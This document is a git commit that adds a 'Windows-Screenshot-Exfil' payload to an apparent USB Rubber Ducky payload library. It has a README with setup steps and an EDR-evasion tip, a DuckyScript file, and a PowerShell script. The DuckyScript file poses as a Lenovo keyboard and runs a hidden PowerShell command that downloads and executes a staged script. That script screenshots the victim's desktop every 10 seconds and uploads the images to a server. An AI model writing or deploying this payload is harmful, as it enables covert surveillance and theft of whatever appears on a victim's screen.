Add Windows-Screenshot-Exfil payload

2024-08-06 09:58:39 +02:00 · 2024-08-06 09:58:39 +02:00 · f0cb608d09
parent 3b30121b9e
commit f0cb608d09
3 changed files with 203 additions and 0 deletions
--- a/payloads/library/exfiltration/Windows-Screenshot-Exfil/README.md
+++ b/payloads/library/exfiltration/Windows-Screenshot-Exfil/README.md
@ -0,0 +1,67 @@
 # Windows Screenshot Exfiltration Payload
 ## Overview
 This payload captures screenshots from a Windows machine every 10 seconds and uploads them to a specified server using the Powershell. The payload is designed to run until the window is closed or the loop is broken out.
 ## Features
 - **Target OS**: Windows 10, 11
 - **Exfiltration Method**: Screenshots are taken and uploaded to a server every 10 seconds.
 - **Detection and Execution**: Automatically detects if the target OS is Windows and executes the payload accordingly.
 - **HID Emulation**: Emulates a Lenovo keyboard with a random serial number.
 - **Fallback**: If the OS is not Windows, the USB Rubber Ducky will function as a storage device.
 ## Files
 - `payload.txt`: The main script that is deployed to the USB Rubber Ducky.
 - `script.ps1`: The Staged PowerShell script that takes screenshots and uploads them to the server.
 ## Setup Instructions
 1. **Server Setup**: Set up a server to receive the uploaded screenshots and host the script.ps1 file. I used [IngoKl/HTTPUploadExfil](https://github.com/IngoKl/HTTPUploadExfil) as it is pretty easy to set up.
 2. **Update URLS**: Modify `script.ps1` to include your server URL where the screenshots will be uploaded and modify `payload.txt` to reference the URL of the hosted `script.ps1`
    - `$url` in `script.ps1`
    - `#MY_STAGED_SCRIPT` in `payload.txt`
 3. **Upload Files**:
   - Inject `payload.txt` on the USB Rubber Ducky.
   - Host `script.ps1` on a web server.
 Note: In the provided files, the exanple URLs are followed by `/l` in the payload and by `/p` for the sending of screenshots, this is because I use HTTPUploadExfil, modify this is you do not use the same exfil server as I do.
 ## Usage
 ### Payload Execution
 1. **Insert USB Rubber Ducky**: Plug the USB Rubber Ducky into the target machine.
 2. **OS Detection**: The payload automatically detects if the target OS is Windows.
 3. **Payload Deployment**:
   - If Windows is detected, it emulates a Lenovo keyboard, opens PowerShell, and runs the PowerShell script.
   - If the target OS is not Windows, it switches to storage mode (Usefull for dev purposes).
 ### PowerShell Script Execution
 The PowerShell script (`script.ps1`) runs the following commands:
 1. Takes a screenshot every 10 seconds.
 2. Uploads the screenshot to the specified server.
 3. Repeats until the PowerShell window is closed.
 ## Alternative
 Some EDR detect the download of a powershell script from internet, this clould led to the payload beeing blocked. As an alternative, you could take the content of `script.ps1` and put in directly in the payload.
 ```
 GUI r
 DELAY 500
 STRINGLN powershell
 DELAY 500
 STRINGLN
    [... The content of script.ps1 here ...]
 END_STRINGLN
 ENTER
 DELAY 500
 ALT SPACE
 STRING n
 ```
--- a/payloads/library/exfiltration/Windows-Screenshot-Exfil/payload.txt
+++ b/payloads/library/exfiltration/Windows-Screenshot-Exfil/payload.txt
@ -0,0 +1,67 @@
 REM_BLOCK DOCUMENTATION
    Title: Windows Screenshot Exfiltration
    Author: https://github.com/thomasboegl1
    Description: This payload sends you screenshots of the screen every 10sec until the Powershell window is closed.
    Target: Windows 10, 11
    Version: 1.0
    Category: Exfiltration
 END_REM
 EXTENSION PASSIVE_WINDOWS_DETECT
    REM VERSION 1.1
    REM AUTHOR: Korben
    REM_BLOCK DOCUMENTATION
        Windows fully passive OS Detection and passive Detect Ready
        Includes its own passive detect ready.
        Does not require additional extensions.
        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay
            $_OS will be set to WINDOWS or NOT_WINDOWS
            See end of payload for usage within payload
    END_REM
    REM CONFIGURATION:
    DEFINE #MAX_WAIT 150
    DEFINE #CHECK_INTERVAL 20
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
    DEFINE #NOT_WINDOWS 7
    $_OS = #NOT_WINDOWS
    VAR $MAX_TRIES = #MAX_WAIT
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
        DELAY #CHECK_INTERVAL
        $MAX_TRIES = ($MAX_TRIES - 1)
    END_WHILE
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
        $_OS = WINDOWS
    END_IF
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
        IF ($_OS == WINDOWS) THEN
            STRING HELLO WINDOWS!
        ELSE
            STRING HELLO WORLD!
        END_IF
    END_REM
 END_EXTENSION
 REM REQUIRED - Provide URL used for staged payload
 DEFINE #MY_STAGED_SCRIPT https://example.com/l/script.ps1
 IF ($_OS == WINDOWS) THEN
    REM Emulate Lenovo keyboard with random serial
    ATTACKMODE HID VID_17EF PID_609B MAN_Lenovo PROD_Duck SERIAL_RANDOM
    REM Open the Run dialog
    GUI r
    DELAY 500
    REM Type PowerShell command
    STRINGLN powershell w- h -NoP -NonI -Exec Bypass $pl = iwr #MY_STAGED_SCRIPT; invoke-expression $pl
 ELSE
    REM The USB Rubber Ducky will function as a flash drive
    ATTACKMODE STORAGE
 END_IF
--- a/payloads/library/exfiltration/Windows-Screenshot-Exfil/script.ps1
+++ b/payloads/library/exfiltration/Windows-Screenshot-Exfil/script.ps1
@ -0,0 +1,69 @@
 Add-Type @'
 using System;
 using System.Runtime.InteropServices;
 using System.Drawing;
 public class DPI {
  [DllImport("gdi32.dll")]
  static extern int GetDeviceCaps(IntPtr hdc, int nIndex);
  public enum DeviceCap {
  VERTRES = 10,
  DESKTOPVERTRES = 117
  }
  public static float scaling() {
  Graphics g = Graphics.FromHwnd(IntPtr.Zero);
  IntPtr desktop = g.GetHdc();
  int LogicalScreenHeight = GetDeviceCaps(desktop, (int)DeviceCap.VERTRES);
  int PhysicalScreenHeight = GetDeviceCaps(desktop, (int)DeviceCap.DESKTOPVERTRES);
  return (float)PhysicalScreenHeight / (float)LogicalScreenHeight;
  }
 }
 '@ -ReferencedAssemblies 'System.Drawing.dll' -ErrorAction Stop
 $url = "https://example.com/p"
 while ($true) {
    # Add necessary types
    Add-Type -AssemblyName System.Windows.Forms,System.Drawing
    # Get virtual screen information
    $s = [System.Windows.Forms.SystemInformation]::VirtualScreen
    # Create a bitmap of the virtual screen size
    $b = New-Object System.Drawing.Bitmap ([int32]([math]::round($($s.Width * [DPI]::scaling()), 0))),([int32]([math]::round($($s.Height * [DPI]::scaling()), 0)));
    [System.Drawing.Graphics]::FromImage($b).CopyFromScreen($s.Left, $s.Top, 0, 0, $b.Size)
    # Save bitmap to a memory stream in PNG format
    $m = New-Object System.IO.MemoryStream
    $b.Save($m, [System.Drawing.Imaging.ImageFormat]::Png)
    $f = $m.ToArray()
    # Set up the multipart form-data
    $boundary = "----WebKitFormBoundary7MA4YWxkTrZu0gW"
    $fileName = "$env:COMPUTERNAME-$(Get-Date -Format HHmmss).png"
    $body = @"
 --$boundary
 Content-Disposition: form-data; name="file"; filename="$fileName"
 Content-Type: image/png
 $f
 --$boundary--
 "@
    # Convert the body to byte array
    $bB = [System.Text.Encoding]::UTF8.GetBytes($body)
    # Set the headers
    $headers = @{
        "Content-Type" = "multipart/form-data; boundary=$boundary"
    }
    # Send the HTTP request
    Invoke-WebRequest -Uri $url -Method Post -Headers $headers -Body $bB
    # Wait for 10 seconds before the next iteration
    Start-Sleep -Seconds 10
 }